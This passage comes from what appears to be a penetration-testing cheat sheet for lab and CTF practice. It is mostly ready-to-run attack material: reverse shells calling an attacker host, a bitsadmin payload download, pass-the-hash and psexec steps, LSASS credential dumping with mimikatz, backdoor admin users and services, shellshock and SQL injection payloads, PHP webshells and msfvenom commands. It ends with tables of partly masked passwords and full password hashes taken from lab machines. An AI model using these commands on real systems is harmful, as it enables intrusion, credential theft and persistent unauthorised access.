>>C:\Windows\d.vbs echo For lngCounter = 0 to UBound(varByteArray) >>C:\Windows\d.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >>C:\Windows\d.vbs echo Next >>C:\Windows\d.vbs echo ts.Close >>C:\Windows\d.vbs dir C:\Windows\d.vbs C:\Windows\d.vbs "http://<targetip>/nc.exe" C:\Windows\nc.exe netcat: nc -w3 <targetip> 1234 <file.sent cmd /c nc.exe -l -v -p 1234 >file.rcvd smb (139/tcp, 445/tcp): server: python smbserver.py -smb2support shared $HOME/toolbox/scripts/shared copy ntlm/lm hashes submitted by windows clients during transfers and crack via jtr/hashcat client: list files: smbclient -L <targetip> --no-pass list files: net view \\<targetip> list files: dir \\<targetip>\shared copy files: copy \\<targetip>\shared\met8888.exe execute files: \\<targetip>\shared\met8888.exe tftp (69/udp): server: atftpd --daemon --port 69 $HOME/toolbox/scripts/shared metasploit: use auxiliary/server/tftp set TFTPROOT $HOME/toolbox/scripts/shared exploit client: download: tftp -i <targetip> GET met8888.exe upload: tftp -i <targetip> PUT hashes.txt install: pkgmgr /iu:"TFTP" ``` ### heartbleed [🡑](#tips) ``` nmap --script=ssl-heartbleed -p <targetport> <targetip> https://github.com/sensepost/heartbleed-poc python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` ### iptables [🡑](#tips) ``` config file: /etc/iptables/rules.v4 ``` ### lfi/rfi/image upload [🡑](#tips) ``` scan: uniscan -u http://<targetip>/ -qweds wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://<targetip>/FUZZ php b64 leak and command execution: php://filter/convert.base64-encode/resource=<pagename> <?php echo passthru($_GET[cmd]) ?> bypass upload filter: change extension to PHP, PHP3, PHP4, PHP5 add magic bytes to start of file (eg: GIF87 to a php shell) to evade upload filters local file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index notice urls that accept a generic filename as parameter: ?page=file1.php ?page=../../../../../../etc/passwd ?page=../../../../../../windows/system32/drivers/etc/hosts ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8): /etc/passwd /proc/self/status find home username in passwd, locate home directory for user: /var/lib/asterisk/.ssh/id_rsa ``` ### passthehash [🡑](#tips) ``` pth-toolkit: git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd xfreerdp: apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP meterpreter: meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell misc: fgdump.exe /usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 //<targetip> cmd.exe wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 administrator@localhost ``` ### passwords [🡑](#tips) ``` shadow file structure: $id$salt$password generate shadow file hash: mkpasswd -m md5 password salt mkpasswd -m sha-256 password salt mkpasswd -m sha-512 password salt ``` ### persistence [🡑](#tips) ``` add a new administrator user: net user anderson cooper /add && net localgroup administrators anderson /add add user to rdp group: net localgroup "Remote Desktop Users" anderson /add enable rdp in firewall: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable netsh firewall add portopening TCP <targetport> "RDP" enable rdp via registry (requries reboot): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f is rdp service running: tasklist /svc | findstr /c:TermService start rdp service: net start TermService permanently enable rdp service: sc config TermService start=auto code: useradd.c: #include <stdlib.h> int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } add user: #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } # compile: i686-w64-mingw32-gcc -o useradd.exe useradd.c ``` ### port forward [🡑](#tips) ``` socat: socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80 & socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 & plink: plink.exe -v -x -a -T -C -noagent -ssh -pw "<localpassword>" -R <targetport>:127.0.0.1:<targetport> <localuser>@<attackerip> meterpreter: # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # forward remote port to local address meterpreter > portfwd add --l <targetport> --p <targetport> --r <targetip> kali > rdesktop 127.0.0.1:<targetport> ``` ### portknock [🡑](#tips) ``` knock once on port <targetport>/tcp: hping3 <targetip> -S -p <targetport> -c 1 nc -vvvz <targetip> <targetport> knock on multiple tcp ports in a given sequence: hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3 <targetip> -S -p 8890 -c 1 nmap -Pn -sT -r -p666,7000,8890 <targetip> ``` ### restricted shells [🡑](#tips) ``` rbash: bash -i BASH_CMDS[foobar]=/bin/bash;foobar lshell: echo os.system("/bin/bash") ``` ### reverse shell [🡑](#tips) ``` reverse tcp shell from bash: /bin/bash -i >& /dev/tcp/<targetip>/<attackerport> 0>&1 make a partially interactive terminal usable: target: python -c "import pty; pty.spawn('/bin/bash')" local: stty raw -echo ; fg target: reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45 -columns 90 ; stty size reverse php shell on windows: https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php ``` ### shellcode [🡑](#tips) ``` /bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ``` ### shellshock [🡑](#tips) ``` look for /cgi-bin/ directory (incldue 403 code for gobuster scan) check for scripts (-x sh,pl) using gobuster test http header, user-agent probably curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl,py nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` ### sql injection [🡑](#tips) ``` manual verification: ' or 1=1 -- - ' || 1=1 # or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 find a row where you can place your output: http://<targetip>/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 get db version: http://<targetip>/inj.php?id=1 union all select 1,2,3,@@version,5 get current user: http://<targetip>/inj.php?id=1 union all select 1,2,3,user(),5 see all tables: http://<targetip>/inj.php?id=1 union all select 1,2,3,table_name,5 from information_schema.tables get column names for a specified table: http://<targetip>/inj.php?id=1 union all select 1,2,3,column_name,5 from information_schema.columns where table_name='users' concat user names and passwords: http://<targetip>/inj.php?id=1 union all select 1,2,3,concat(name, 0x3a , password),5 from users write to a file: http://<targetip>/inj.php?id=1 union all select 1,2,3,"content",5 into outfile 'outfile' ``` ### startup scripts [🡑](#tips) ``` chmod +x /foo/bar update-rc.d /foo/bar defaults ``` ### stegnography [🡑](#tips) ``` strings exiftool steghide ``` ### tmux shortcuts [🡑](#tips) ``` prefix: ctrl + b toggle logging: prefix + shift + p screen cap: prefix + alt + p complete history: prefix + alt + shift + p ``` ### tunneling [🡑](#tips) ``` connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service on localhost, run a local standalone daemon on <targetport>: proxytunnel -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234 ssh [email protected] /bin/bash vim /etc/proxychains.conf http <targetip> <targetport> proxychains nmap -sT -p22 <targetip> proxychains ssh <username>@<targetip> /bin/bash forward remote port to local address: plink.exe -P 22 -l root -pw "<password>" -R 445:127.0.0.1:445 <targetip> ``` ### windows useful commands [🡑](#tips) ``` net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport> -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv <targetip> <targetport> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` <a name="tools"></a> ## 💥 Tools [↟](#contents) ### burp [🡑](#tools) ``` set an upstream proxy within burp: burp > user options > upstream proxy > <targetip>:<targetport> ``` ### cewl [🡑](#tools) ``` cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null ``` ### fcrackzip [🡑](#tools) ``` fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip> unzip -o -P "password" <file.zip> ``` ### gobuster [🡑](#tools) ``` start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist search file extension: gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php gobuster dir -u http://<targetip>:<targetport>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" quick: gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux full/comprehensive: gobuster -s 200,204,301,302,307,403 -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' ippsec: gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,403 -k -x txt,php,asp gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl cgi list: /usr/share/seclists/Discovery/Web-Content/CGIs.txt ``` ### hashcat [🡑](#tools) ``` hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt ``` ### hydra [🡑](#tools) ``` generic: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> ftp: hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ftp http: hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V with cookie: hydra -l user -P /usr/share/wordlists/rockyou.txt <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie: insert stuff here' pop3: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> pop3 rdp: hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<targetip> smtp: hydra -s 25 -v -V -l [email protected] -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <targetip> smtp ssh: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword <targetip> ssh wordpress: hydra -l elliot -P ./fsocity.dic <targetip> http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR" ``` ### john [🡑](#tools) ``` create custom wordlist: john --wordlist=megacorpone-cewl --rules --stdout >megacorpone-cewl-jtr crack shadow hashes: unshadow passwd shadow >unshadowed ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john --show unshadowed crack md5 hashes: john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes ``` ### kernel module [🡑](#tools) ``` rootkit: https://github.com/PinkP4nther/Pinkit ``` ### merlin c2 framework [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>" -o merlinagentx64.exe main.go go build -o merlinagent.elf main.go ``` ### metasploit [🡑](#tools) ``` db_status load mimiktaz msfconsole -q msfdb init msfdb start search <string> set payload windows/x86/meterpreter/reverse_tcp set verbose true show advanced show options show payloads show targets systemctl start postgresql systemctl status postgresql wdigest ``` ### msfvenom [🡑](#tools) ``` linux bind tcp shellcode: msfvenom -p linux/x86/shell_bind_tcp lport=4444 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai windows reverse tcp shellcode: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -b "\x00\x0a\x0d" -f c -a x86 --platform windows -e x86/shikata_ga_nai revere tcp shellcode for client-side exploit without any encoder: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -f js_le --platform windows -a x86 -e generic/none php reverse meterpreter: msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f raw -o shell.php php reverse shell: msfvenom -p php/reverse_php LHOST=<targetip> LPORT=80 -f raw -o reverse.php java war reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war windows javascript reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f js_le -e generic/none -n 18 windows powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 linux reverse tcp shell elf shared object file: msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport> -o linux-shell-reverse-tcp.so ``` ### netcat [🡑](#tools) ``` bind: nc -lvp <attackerport> connect: nc -nv <targetip> <attackerport> reverse: nc -e /bin/bash <targetip> <attackerport> ``` ### ncrack [🡑](#tools) ``` bruteforce rdp login: ncrack -vv --user administrator -P passwords.txt rdp://<targetip> ``` ### netdiscover [🡑](#tools) ``` netdiscover -r 192.168.92.0/24 ``` ### nikto [🡑](#tools) ``` nikto -h http://<targetip> nikto -C all -h http://IP nikto -h <targetip> -useproxy http://<targetip>:3128 ``` ### nmap [🡑](#tools) ``` vulners nse script: https://github.com/vulnersCom/nmap-vulners searchsploit-like vuln scan: nmap --script vulners --script-args mincvss=5.0 <targetip> ping sweep: nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap | grep Up | cut -d" " -f2 quick tcp: nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap <targetip> quick udp: nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip> full/intensive tcp: nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip> full/intensive udp: nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip> smb bruteforce: nmap --script=smb-brute.nse <targetip> nmap -sV -p 445 --script smb-brute <targetiprange> ``` ### openssl [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate valid for 7 days openssl req -new -key caca.key -out caca.csr ## create a new certificate signing request (csr) openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ## generate new certificate openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate pkcs12 certificate ``` ### searchsploit [🡑](#tools) ``` nmap service scan output -> searchsploit: nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml ``` ### socat [🡑](#tools) ``` socat file:`tty`,raw,echo=0 tcp-listen:<attackerport> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport> ``` ### sqlmap [🡑](#tools) ``` avoid prompts, use defaults: sqlmap --batch read http request from a text file (request captured from burp, useful for POST requests) and use it to start scan: sqlmap -r searchform.txt --dbs --batch sqlmap -r searchform.txt -D webapphacking --dump-all --batch post requests: sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST intrusive scans: sqlmap --level 5 --risk 3 list databses: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs list tables within a database: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables dump a table: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --dump blind sql enumeration: sqlmap -u "http://<targetip>:<targetport>/index.php" --forms --dbs ``` ### steghide [🡑](#tools) ``` steghide extract -sf file.jpg ``` ### unicornscan [🡑](#tools) ``` scan all 64k ports: unicornscan -vmT <targetip>:a scan first 1k ports: unicornscan -vmT <targetip>:p scan in udp mode: unicornscan -vmU <targetip> ``` ### wfuzz [🡑](#tools) ``` enumerate directories: wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php" wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ wfuzz -w common.txt -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t 50 http://<targetip>:4488/FUZZ enumerate directories and filter on response length: wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ bruteforce password: bruteforce a single list: wfuzz -w pwds.db -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists: wfuzz -w pwds.db -w pins.txt -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists, but faster: wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ' --hh 45,41 http://<targetip>:<targetport>/login.php ``` <a name="loot"></a> ## 🔥 Loot [↟](#contents) <a name="credentials"></a> ### 🔑 Credentials [🡑](#loot) | # | Username | Password | Type | |---|----------|----------|------| | 1. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ftp` | | 2. | `veronica` | `babygirl_veronica07@yah......` | `ftp` | | 3. | `eric` | `ericdoesntdrinkhiso.....` | `ftp` | | 4. | `Balrog` | `Mell..` | `ftp` | | 5. | `eezeepz` | `keKkeKKeKKeKkE....` | `http` | | 6. | `john` | `MyNameIsJ...` | `liggoat` | | 7. | `robert` | `ADGAdsafdfwt4gadf....` | `liggoat` | | 8. | `dreg` | `Mast..` | `lotuscms` | | 9. | `loneferret` | `starwa..` | `lotuscms` | | 10. | `admin` | `kEjdbRigfBHUREi....` | `mysql` | | 11. | `john` | `thiscannotb...` | `mysql` | | 12. | `wpdbuser` | `meErKa..` | `mysql` | | 13. | `mysql` | `mysql@12...` | `mysql` | | 14. | `admin` | `3298fj8323j80d....` | `mysql` | | 15. | `wordpress` | `Oscp1234..` | `mysql` | | 16. | `john` | `hiroshi..` | `mysql` | | 17. | `root` | `fuckey..` | `mysql` | | 18. | `Admin` | `TogieMYSQL123....` | `mysql` | | 19. | `root` | `darkshad..` | `mysql` | | 20. | `sql_svc` | `M3g4c0rp...` | `sql` | | 21. | `administrator` | `MEGACORP_4dm....` | `ssh` | | 22. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ssh` | | 23. | `pi` | `raspber..` | `ssh` | | 24. | `fox` | `12345..` | `ssh` | | 25. | `eric` | `triscui..` | `ssh` | | 26. | `anne` | `prince..` | `ssh` | | 27. | `graham` | `GSo7isUM...` | `ssh` | | 28. | `root` | `1234.` | `ssh` | | 29. | `admin` | `thisisalsopw...` | `ssh` | | 30. | `fristigod` | `LetThereBeFri....` | `ssh` | | 31. | `dreg` | `Mast..` | `ssh` | | 32. | `loneferret` | `starwa..` | `ssh` | | 33. | `john` | `MyNameIsJ...` | `ssh` | | 34. | `robert` | `ADGAdsafdfwt4gadf....` | `ssh` | | 35. | `togie` | `1234.` | `ssh` | | 36. | `bob` | `secr..` | `ssh` | | 37. | `susan` | `MySuperS3cretVa....` | `ssh` | | 38. | `insecurity` | `P@ssw0..` | `ssh` | | 39. | `smeagol` | `MyPreciousR...` | `ssh` | | 40. | `Ori` | `span..` | `ssh` | | 41. | `robot` | `abcdefghijklmnopqrstu.....` | `ssh` | | 42. | `mark` | `5AYRft73VtFp....` | `ssh` | | 43. | `wpadmin` | `wpadm..` | `ssh` | | 44. | `root` | `rootpasswo...` | `ssh` | | 45. | `user` | `letme..` | `ssh` | | 46. | `tomcat` | `submitthisforpo....` | `tomcat` | | 47. | | `execrab..` | `truecrypt` | | 48. | `rascal` | `lov.` | `webapp` | | 49. | `user1` | `hell.` | `webapp` | | 50. | `user2` | `comman..` | `webapp` | | 51. | `user3` | `p@ssw0..` | `webapp` | | 52. | `test` | `testte..` | `webapp` | | 53. | `superadmin` | `Uncracka...` | `webapp` | | 54. | `test1` | `testte..` | `webapp` | | 55. | `admin` | `5afac8d8..` | `webapp` | | 56. | `john` | `66lajGGb..` | `webapp` | | 57. | `frodo` | `iwilltakethe....` | `webapp` | | 58. | `smeagol` | `MyPreciousR...` | `webapp` | | 59. | `aragorn` | `AndMySwo..` | `webapp` | | 60. | `legolas` | `AndMyB..` | `webapp` | | 61. | `gimli` | `AndMyA..` | `webapp` | | 62. | `myP14ceAdm1nAcc0uNT` | `manchest..` | `webapp` | | 63. | `tom` | `spongeb..` | `webapp` | | 64. | `mark` | `snowfla..` | `webapp` | | 65. | `john` | `enig..` | `wordpress` | | 66. | `mark` | `helpdesk..` | `wordpress` | | 67. | | `admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2........` | `wordpress` | | 68. | `admin` | `TogieMYSQL123....` | `wordpress` | | 69. | `elliot` | `ER28-06..` | `wordpress` | | 70. | `admin` | `admi.` | `wordpress` | <a name="hashes"></a> ### 🔑 Hashes [🡑](#loot) | # | Hash | |---|------| | 1. | `abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::` | | 2. | `admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::` | | 3. | `Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::` | | 4. | `Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::` | | 5. | `anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::` | | 6. | `anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::` | | 7. | `arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::` | | 8. | `ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::` | | 9. | `Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::` | | 10. | `billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::` | | 11. | `bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::` | | 12. | `bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::` | | 13. | `brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::` | | 14. | `crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::` | | 15. | `doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::` | | 16. | `dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::` | | 17. | `eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::` | | 18. | `eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::` | | 19. | `fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::` | | 20. | `graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::` | | 21. | `Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::` | | 22. | `hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::` | | 23. | `harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::` | | 24. | `harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::` | | 25. | `Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::` | | 26. | `IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::` | | 27. | `IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::` | | 28. | `jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::` | | 29. | `john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::` | | 30. | `john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::` | | 31. | `john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::` | | 32. | 